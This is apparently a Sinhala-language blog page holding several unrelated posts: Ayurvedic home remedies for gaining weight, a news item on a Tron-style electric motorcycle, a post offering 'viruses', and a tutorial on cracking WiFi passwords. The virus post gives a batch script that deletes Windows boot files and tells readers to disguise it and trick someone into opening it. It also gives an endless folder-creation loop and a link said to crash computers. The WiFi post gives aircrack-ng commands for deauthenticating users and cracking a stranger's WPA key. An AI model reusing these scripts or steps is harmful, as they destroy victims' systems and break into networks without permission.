ඉතින් ඉතින් ඇඟ කෙට්ටු කරගන්න හරි මහත් කරගන්න හරි බෙහෙත් බීලා අන්තිමේට නැති ලෙඩ 1000ක් විතර හදාගෙනයි නවතින්න වෙන්නේ. ඔයාලා සමහරවිට දැකලත් ඇති සමහර උදවිය මහත් වෙන්න බෙහෙත් බීලා ඒයාලගේ මූන විතරක් මහත් වෙලා තියනවා. ඉතින් මම කල්පනා කලා අද කට්ටියටම අපේ ආයුර්වේදයේ තියන බෙහෙත් ක්‍රම මගින් ටිකක් මහත් වෙන හැටි කියලා දෙන්න. එහෙනම් වැඩේ පටන් ගමු...

මෙන්න එහෙනම් රහස් දේශීය බෙහෙත් වට්ටෝරු 
කෝලි කුට්ටු ගෙඩියක් පෙති කපා එයට පිරිසිඳු කිතුල් පැනි දමා රාත්‍රී ආහාරයට පෙර කෑම.
 
රටඉඳි වල ඇට ඉවත් කර ඒතුලට එලඟිතෙල් පුරවා මීපැනි මිශ්‍රිත භාජනයක බහාතබා, උදේ සවස ගෙඩි හතර බැගින් ආහාරයට ගෙන එලකිරි පානය.
 
නැවුම් එලකිරි වලට පිරිසිඳු එලඟිතෙල් ස්වල්පයක් දමා පානය.
හාතවාරිය අල වලින් කැඳ සාද පානය.
 
අලුත් උක් හකුරු,එලඟි තෙල් හා මීපැනි සමග මිශ්‍රකර ගුලි සාදා කෑමට පසු ගැනීම.
 
තිප්පිලි, වියලි ඉඟුරු චූර්නය ස්වල්ප ප්‍රමානයක් බත් සමග මිශ්‍ර කර කෑම (පිලිස්සුම් තුවාල ඇත්නම් අගුනයි.)
 
බිත්තර සුදුමදය එලකිරි සමග මිශ්‍ර කර පානය.
 
කුෂ්මාන්ඩ රසායනය උදේ සවස තේ හැඳි 2ක ප්‍රමානයක් කා එල කිරි පානය

6:07 PM

2010 වසරේ දී තිරගත වුනු Tron (ට්‍රොන්) කියන චිත්‍ර පටය ඕගොල්ලොන්ට මතක ඇති. මතක නැත්තන් හරි අහල නැත්තන් හරි පොඩ්ඩක් ගූගල් කරලා බැලුවත් කමක් නෑ. කොහොම හරි මේ චිත්‍රපටයට පිස්සුවෙන් වගේ ආදරය කරන එක රසිකයෙක් ඩොලර් 77,000ක් ම වියදම් කරලා මේ ඉලෙක්ට්‍රික් මෝටර් සයිකලය මිලදීගෙන තිබෙනවා. 2010 වසරේ දී තිරගත් වුනු Tron චිත්‍රපටයේ භාවිතා වන මෝටර් බයිසිකලයට බෙහෙවින් සමාන අනුරුවක් මෙලෙස අලෙවි වී තිබෙනවා. අලංකාර විදුලි බුබුළු වලින් සැරසුණු මෙම මෝටර් සයිකලය RM Sotheby සමාගමෙන් ඩොලර් 25,000 ත් 40,000 ත් අතර මුදලකට වෙන්දේසි කිරීම සඳහා සුදානම් කර තිබිණ.

වෙන්දේසියට අදාළ විස්තර වලට අනුව මෙම යතුරු පැදිය වෝල්ට් 96 ක Direct -Drive ඉලෙක්ට්‍රික් මොරටයකින් සහ ලිතියම් බැටරියකින් පනගැන්වෙයි. පරිගණක පද්ධතියකින් ද සමන්විතයි. ඉදිරි සහ පසු පස හයිඩ්‍රෝලීක තිරිංග පද්ධතියකින් ද සමන්විතයි.
මෝටර් සයිකල මිලදී ගත් පුද්ගලයා පිළිබඳව එතරම් තොරතුරු හෙළි වී නොමැති බවත් දැනගන්නට ලැබෙනවා. මෙම මෝටර් රටයේ අසුන අඟල් 28.5ක් පමණ උස වන නිසා ඕනෑම වේගයක දී පහසුවෙන් ධාවනය කල හැකි බවත් දැනගන්නට ලැබෙන අතරම මෙය නිත්‍යානුකුල වාහනයක් බවත් පැවසෙනවා

11:50 PM

    "DO AT YOUR OWN RISK"

ඔක්කොටම කලින් දැක්ක නේද ඔය දිලිසි දිලිසි රතු අකුරින් තියන එක. හරි හරි එහෙනම් වැඩේ මෙහෙමයි. අද දෙනවා සුපිරි වයිරස් 3ක්. ඒකත් දෙන එක රිදෙන්නම දෙනවා.




1. URL එකකින් සිස්ටම් එක Crash කරමු.



මෙච්චරයි මේකේ කතාවනම්. පහල තියන URL එක ක්ලික් කළා කියන්නේ ටොපිය කෑවා කියන එක තමයි. මේක ක්ලික් කරලා පැයක් හමාරක් යද්දී කම්පියුටර් එකේ මුළු සිස්ටම් එකටම බබා හම්බ වෙනවා. ඉතින් තේරෙනවා නේද කරන්න ඕන වැඩේ. කාටහරි URL එකක් ක්ලික් කරවන එක මහා ලොකු වැඩක් නෙමෙයිනේ. ඔන්න එහෙනම් පහල තියනවා බඩු. ලින්ක් එක තවමනම් වැඩ කරනවා. අනාගතය ගැනනම් කියන්න දන්නේ නැහැ. ඔයාලගේ ආරක්ෂාව සදහා ලින්ක් එක නිකන් Text එකක් විදිහටයි දාල තියෙන්නේ.



http://tiny.cc/ibJUN




2. පරිගණකයක් සදහටම නිදි කරවමු



මේකෙත් පොඩි කුප්පියක් තියෙන්නේ. ඒත් වෙන වැඩේනම් පොඩි නැහැ. මේකෙන් වෙන්නේ පරිගණකය Shut Down වෙලා Reboot වෙන්න ඕනා ෆයිල්ස් ටික මකලා පරිගණකය Restart වෙවී තියන එකයි. මේ පහල තියන ටෙක්ස්ට් ටික Notepad එකකට Paste කරලා මොකක්හරි නමක් දීලා අන්තිමට .bat කියලා දීලා සේව් කරන එකයි.

උදා:- Athwela.bat

ඔන්න ඔය වගේ. මෙන්න පහල තියනවා කෝඩ් එක.




@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

ඒ ෆයිල් එකේ Icon එක එහෙම පොඩ්ඩක් වෙනස් කරලා කාටහරි දුන්නම කොහොමද දැනෙන සනීපෙ.. තේරුනා නේද මොනවද කියන්නේ කියලා.. ;) ඊට පස්සේ දෙන්න කාටහරි Open කරන්න කියලා.

සැ.යු.- මේ ෆයිල් එක Open කරලා වැඩේ උනාට පස්සේ Recovery කරන්නත් බැහැ හොදද..


3. තත්පර කීපයකින් Folders 1000කට වඩා හදමු

මේකෙදි කරන්න තියෙන්නේ ඔය දෙවෙනි එකේ කරපු ටිකමයි. කෝඩ් එක විතරයි වෙනස්. ආහ්හ්හ්.. මේක Rename කරන්න ඕන 1000folders.bat කියන විදිහට. පස්සේ ඉතින් පුළුවන් Shortcut එකක් එහෙම දාල නමයි Icon එකයි එහෙම වෙනස් කරගන්න. ඔන්න එහෙනම් පහල තියනවා කෝඩ් එක..

@echo off
:top
md %random%
goto top 

එහෙනම් අදට කුප්පිය ඉවරයි... තව ඉස්සරහට මේ වගේ දේවල් දෙන්නම්කො..

* _______________________________________________________ *
වෙබ් අඩවියේ සාමාජිකයෙකු වීමට වම් පස පහලම Join This Site මත Click කරන්න.ඔබට එවිට එසැනින් අලුත් ලිපි ලබා ගත හැක.

තවත් මේවගේ වටින කියන ලිපියකින් හමුවෙමු.
ඔබේ වටිනා අදහස් පහතින් දාන්නත් පුලුවන්
 

11:24 PM



වයිෆයි  (WiFi) ගැන ඔයාලා දන්නවනේ නේද?  WiFi කියන්නෙ වයර් රහිතව කරන සංන්නිවේදන කටයුත්තකට. ( Wireless Fidelity, wireless internet) ඉතින් මේ ආකාරයට  වයර් රහිතව  සංන්නිවේදන කටයුතු කරන්නේ පහසුවට.  වයර්  එක්ක වැඩ කරන්න අපහසු හින්දා. ඉතින් ඒ ආකාරයට වැඩකරන ස්තානයකට අපි කියනවා WiFi Hotspot එකක් කියලා.  WiFi Hotspot එකක වෙබ් අඩවි තහනම් කිරීමක් බාගන්න තියන වේගය අඩාල කිරීමක් වගේ දේවල් සිද්දවෙන්නෙ නේ. ඒ කියන්නෙ  WiFi Hotspot  එකකදී අන්තර්ජාලය පුල් නිදහස් කියන එක.  ඉතින් මේ  WiFi Hotspot  ජාලකරන තලමිතීන් අනුව ආරක්ශිතව හදලයි තියෙන්නේ. ඒ කියන්නෙ මුරපද දාල වගේ.  ඉතින් දැන් කියන්න යන්නේ කොහොමද මේ මුරපද බිදගෙන  WiFi Hotspot  එකක් ඇතුලට යන්නෙ කියලා



මේ වැඩේ කරන්න පහල දේවල් ඕනේ

1. Linux Backtrack 5 RC2 ( ඔයාල භාවිතා කරන පරිගනකයේ ඕස් එකට අදාල වර්ශන් එක බාගන්න)







2 හොදට වැඩ කරන wireless කාඩ් එකක්


3. දැනට බාවිතා වෙන පාස්වර්ඩ් ලිස්ට් එකක්. මේක නම් ගූගල් වලින් හොයාගන්න පුලුවන්. ටිකක් කම්මැලි නම් මෙන්න තියනවා පාස්වර්ඩ් 1717681

ම.




හරි, මන් හිතන්නේ ඔයාලා දැන් Linux Backtrack 5 RC2 බාගෙන සීඩී එකකට ගහගෙන එහෙම ඇති කියලා. ඊලගට පරිගනකය ඒ සීඩී එකෙන් බූට් කරන්න. ලිනක්ස් ගැන ටිකක් දැනගෙන ඉන්න නම් ඕනේ. කමක් නෑ දන්නේ නැත්නම් මං ස්ක්‍රීන් සොට්ස් ටිකක් දාන්නම්.
පලමු පියවර 
මුලින්ම root@bt:~# කියන තැනට airmon-ng කියන විදානය බාවිතා කලාම ඉහල රූපයේ ආකාරයට දැනට තියන WiFi නෙට්වර්ක් මොනවද කියලා පෙන්නනවා 
මෙතන පෙන්නන wlan0 කියන WiFi නෙට්වර්ක්  එක උපකාර කරගෙනයි මම ඉස්සරහට හැමදේම කියන්නෙ. ඉතින් ඔයාලා wlan0 වෙනුවට භාවිතා කරන්න ඕනේ ඔයාලට හැක් කරන්න් ඕනේ WiFi නෙට්වර්ක්  එකේ නම 
දෙවන පියවර 
airmon-ng start wlan0 කියන විදානය ලබා දෙන්න. මේකෙන් අපි බලන්නේ අපිට හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එක ක්‍රියාකාරී තත්වයෙන් තියනවද කියල.

තුන්වන පියවර 

මෙතනදි අපි ifconfig කියන විදානය ලබා දෙනවා. එතනදි අපිට පහල ආකාරයට හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එකේ තොරතුරු බලගන්න පුලුවන්.






හතරවන පියවර 
මෙතනදි කරන්න බලපොරොත්තු වෙන්නෙ හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එකේ මැක් ඇඩ්ර්ස් එක වෙනස් කරන්න. පහල විදානය බාවිතා කරන්න.
macchanger –m 00:11:22:33:44:55 wlan0
පස්වන පියවර 
මෙතනදි අපි කරන්නෙ අලුත් කරපු මැක් ඇඩ්ර්ස් එක නිවැරදි ආකාරයෙන් වැඩ කරනවද කියන එක බලන එක. ඒකට පහත විදානය බාවිත කරන්න පුලුවන්. 
airodump-ng mon0
හයවන පියවර 
ඊලගට අපිට බලගන්න පුලුවන් අපි හැක් කරන්න යන WiFi නෙට්වර්ක් එකේ නියම නම. SSID එක. රතුපාටින් දාල තියෙන්නෙ ඒක. ඊට පස්සෙ අපිට් පුලුවන් අපි හැක් කරන්න් යන WiFi නෙට්වර්ක් එකට මේ වෙනකොට ලොග් වෙල් ඉන්න් කෙනෙක්ව හොයගන්න. ඒකට පහල විදානය දෙන්න. 
airodump-ng –c 6 –w crackwpa –bssid 02:1A:11:FE:A4:CE
 කොල පාටින් තියෙන්නෙ ඒ වගෙ ලොග් වෙලා ඉන්න කෙනෙක්ගේ මැක් එකක්. 
හත්වන පියවර 
ඊලගට කරන්න ඕනේ දැනට ලොග්වෙල ඉන්න කෙනා එක්ක පොඩි handshake දාගන්න  ඒකට පහල විදානය දෙන්න. 
aireplay-ng –0 –4 –a MAC-ADDR-OF-ROUTER –c MAC-ADDR-OF-CLIENT mon0
මේ විදානය දුන්නට පස්සෙ ඉහල රූපයේ පෙනෙන ආකරයට විදානයන් ක්‍රියත්මක වෙයි.
අටවන පියවර 
ඊට පස්සෙ අපිට පුලුවන් දැනට ලොග් වෙල් ඉන්න කෙනාගේ උදවුවෙන් ලොග් වෙල ඉන්න  WiFi නෙට්වර්ක් එකේ  පාස්කී එක ලබා ගන්න.  ඒකට පහල විදානය දෙන්න. 
aircrack-ng crackwpa-01.cap –w list


මෙතන් list කියන තැනට අපි අර බාගත්ත පාස්වර්ඩ් ලිස්ට් එකේ පාත්  එක දෙන්න ඕනේ. 
ඉතින් ඔන්න කොල පාටින් දක්වලා තියන ආකාරයට අපිට හැක් කරන්න ඕනේ  WiFi නෙට්වර්ක් එකේ  පාස්කී එක පෙන්නනවා. දැන් ඉතින් අපිට පුලුවන් ඒ පාස් කී එක බාවිතා කරල අපිට ඕනේ විදියට නෙට්වර්ක්  එකා බාවිතා කරන්න
Powered by Blogger.